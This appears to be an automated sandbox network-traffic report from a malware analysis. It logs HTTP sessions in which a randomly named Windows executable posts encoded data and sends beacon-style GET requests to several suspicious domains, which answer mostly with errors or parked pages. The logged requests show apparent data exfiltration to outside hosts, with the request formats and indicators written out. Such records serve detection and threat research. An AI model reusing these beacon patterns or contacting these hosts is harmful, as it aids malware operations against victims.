                                                                              Location: http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==
                                                                              Content-Length: 442
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/?Gxq=1VbhX6&amp;t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg==">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.5 | 49483 | 134.122.133.80 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:47.101634026 CET | 680 | OUT | POST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=sWoz/ZBR6ck/mq9tQFo3Wcbks/srizQJFd9ogkojgenCLsWSslXwN+qJffgBYGTZmIvQGKJh80ZilEoa4kkp4keoE3P/7lWHjUTErJvktdxokaCn+9G3G4veQQ0oEb759G9YrFklpY62WNNtl0Fs99JtMqf652nsuhFS7HHR8qt0p9Dt7m08wZ7QJq90o23k9wGPnZs=
                                                                              Jan 14, 2025 12:02:47.992187023 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:47 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.5 | 49484 | 134.122.133.80 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:49.653376102 CET | 700 | OUT | POST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=sWoz/ZBR6ck/nKNtSmw3CMbngfsrrTQFFd5ogltogtTCIMGStg3wO+qJX/gEcGTkmIr2GOVh80NilFYa4TY2+keqIXPh/lWHjUTErN/CtdponrSnsMG4aIvfRQ0oAb6w9G9qrE4DpaC2WJBtlmtz39JvSafq22q7pzQZ3WKllYlqsLyHhE8Uj5XoZ51D5GWNnTW/5O7cH19buR+R+ogr67ia3Z5l
                                                                              Jan 14, 2025 12:02:50.518213987 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:50 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.5 | 49485 | 134.122.133.80 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:52.192111015 CET | 1717 | OUT | POST /3541/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              Origin: http://www.x3kwqc5tye4vl90y.top
                                                                              Referer: http://www.x3kwqc5tye4vl90y.top/3541/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:53.252290964 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:52 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.5 | 49486 | 134.122.133.80 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:54.734879971 CET | 402 | OUT | GET /3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.x3kwqc5tye4vl90y.top
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:55.619914055 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                              Content-Length: 146
                                                                              Content-Type: text/html
                                                                              Date: Tue, 14 Jan 2025 11:02:55 GMT
                                                                              Server: nginx
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.5 | 49487 | 47.83.1.90 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:08.838386059 CET | 653 | OUT | POST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=aY4y9JZpn+maNyqM0p+ssQtkebjrBVowSNOClto1bCd3c7BavvaFPl2eDuNywzU4urhGV35oHwCfYWJQvznP0IwwNVFMyQQxu3VVSh3JPFlKAd+mynMZM1cwWXU0LqYdV/VtQ0IYAhbAiB8XNOCRqZpMyJe4CRIX+nVVNval9CUYjHWStvpBC9aK/Le8jcwgFaiOYIw=


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.5 | 49488 | 47.83.1.90 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:11.380228043 CET | 673 | OUT | POST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=aY4y9JZpn+maCxiMnY+srwtnQ7jrTVo0SNyCls8faw53delautyFCF2ebeN3+TU3uspOVyBoHw+fYUBQvCnMyYwyYFFOqwQxu3VVShjnPFNKAtOmzC4YXVczRXU0PqYZV/UCQ1l9AijAiEQXNfCSjZom9pfnTDZi40tZMur9rQY1ixn43NhpRd2yvYWLysRJf5y+GfmVMG/6/nF9Bv7fYg8TBiMg
                                                                              Jan 14, 2025 12:03:12.829078913 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 14 Jan 2025 11:03:12 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.5 | 49489 | 47.83.1.90 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:13.929827929 CET | 1690 | OUT | POST /bqha/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.qzsazi.info
                                                                              Origin: http://www.qzsazi.info
                                                                              Referer: http://www.qzsazi.info/bqha/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.5 | 49490 | 47.83.1.90 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:16.473526001 CET | 393 | OUT | GET /bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.qzsazi.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:18.078668118 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                              Server: nginx/1.18.0
                                                                              Date: Tue, 14 Jan 2025 11:03:17 GMT
                                                                              Content-Length: 17
                                                                              Connection: close
                                                                              Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                              Data Ascii: Request too large


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.5 | 49491 | 84.32.84.32 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:23.170435905 CET | 665 | OUT | POST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=CjcpzjRL9l2ZG+GUmXINJCo3rBTsy8wGyNDsjFF6paYycsgMXL7aQgdE+j7GlzN9ymD2JEpb8wLRKCdZO5PQ5Sal39YtSvFtF6THrzu+pedot127hOs0wyGYn4joBVb5ZD8h0qNh1yRwmW8y53mO2SCI2a9jEAeymZiyvdd2Vc10y2W0LaOg9Cr5A1foYPmqjJv/NQI=


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.5 | 49492 | 84.32.84.32 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:25.709511042 CET | 685 | OUT | POST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=CjcpzjRL9l2ZUuWU1kQNOio0uBTs5cwKyNPsjAhqpIMyFNQMFfvaTgdE2D6thzN0yhL+JFlb8z3RKDtZOObTjian/dY4dPFtF6THrz6Upf5otFG7gqY35SGb3ojoFVayZD8X0rQp10NwmVoy5leRhCCOya8qESC6pIX5tOwjMPts6gneR4GIuiHBQmXfJ/HD5q/PTHfotIVN9zR4IT9FyFwlZ/gz


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.5 | 49493 | 84.32.84.32 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:28.254761934 CET | 1702 | OUT | POST /m320/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.truckgoway.info
                                                                              Origin: http://www.truckgoway.info
                                                                              Referer: http://www.truckgoway.info/m320/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.5 | 49494 | 84.32.84.32 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:30.803652048 CET | 397 | OUT | GET /m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.truckgoway.info
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:03:31.247462988 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 11:03:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 9973
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Server: hcdn
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              x-hcdn-request-id: f8752071b58a0e55ce23713f1e3fd4de-bos-edge1
                                                                              Expires: Tue, 14 Jan 2025 11:03:30 GMT
                                                                              Cache-Control: no-cache
                                                                              Accept-Ranges: bytes
                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 14, 2025 12:03:31.247546911 CET | 224 | IN
                                                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                                              Jan 14, 2025 12:03:31.247581005 CET | 1236 | IN
                                                                              Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                                              Jan 14, 2025 12:03:31.247628927 CET | 1236 | IN
                                                                              Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                                              Jan 14, 2025 12:03:31.247664928 CET | 1236 | IN
                                                                              Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                                              Jan 14, 2025 12:03:31.247704029 CET | 672 | IN
                                                                              Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                                              Jan 14, 2025 12:03:31.247745037 CET | 1236 | IN
                                                                              Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                                              Jan 14, 2025 12:03:31.247781038 CET | 1236 | IN
                                                                              Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                                              Jan 14, 2025 12:03:31.247816086 CET | 1236 | IN
                                                                              Data Ascii: ngeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("p
                                                                              Jan 14, 2025 12:03:31.247850895 CET | 104 | IN
                                                                              Data Ascii: h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g
                                                                              Jan 14, 2025 12:03:31.248250008 CET | 660 | IN
                                                                              Data Ascii: <=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split(


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.5 | 49495 | 213.171.195.105 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:36.311620951 CET | 680 | OUT | POST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=5Oga9EzjhERs0F/obsXa2GqspK4LEzdvD1BtcBk+gzdLLl1AhObuTMzCSZGPp20pRDwmdcYAXIXYasO56Qz26PYg3G93BAFLYKnqJPhhxAsunsRY9kKz0JRsLcXT96Iw9TR7lMwkl5jepfQmvO5wYuN+05UUVIuqXcgYwaD0YIrSGQegZnAcQ3K5DaWZpGKYEAa3jB8=
                                                                              Jan 14, 2025 12:03:36.910003901 CET | 309 | IN | HTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:36 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.5 | 49496 | 213.171.195.105 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:38.849809885 CET | 700 | OUT | POST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=5Oga9EzjhERs1mnoeP/aj2qtsK4LNTdrD1NtcF91hB5LIEFAiPbuUMzCKJGGmW1rRDNTdcUAXIDYauW56hz17fYij291cQFLYKnqJP08xA0unf5Ysx2wqZRvIcXT56J79TRVlNsel9Tepa0m2/5zTuNk5ZUEYsilONdYtKONL6z1DmvKDFI0DXmBTJeu42rxejKH9WqdKTlLtc1giyFcdS0jmVtG
                                                                              Jan 14, 2025 12:03:39.429853916 CET | 309 | IN | HTTP/1.1 405 Not Allowed
                                                                              server: nginx/1.20.1
                                                                              date: Tue, 14 Jan 2025 11:03:39 GMT
                                                                              content-type: text/html
                                                                              content-length: 157
                                                                              connection: close
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.5 | 49497 | 213.171.195.105 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:03:41.404009104 CET | 1717 | OUT | POST /he9k/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aloezhealthcare.info
                                                                              Origin: http://www.aloezhealthcare.info
                                                                              Referer: http://www.aloezhealthcare.info/he9k/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
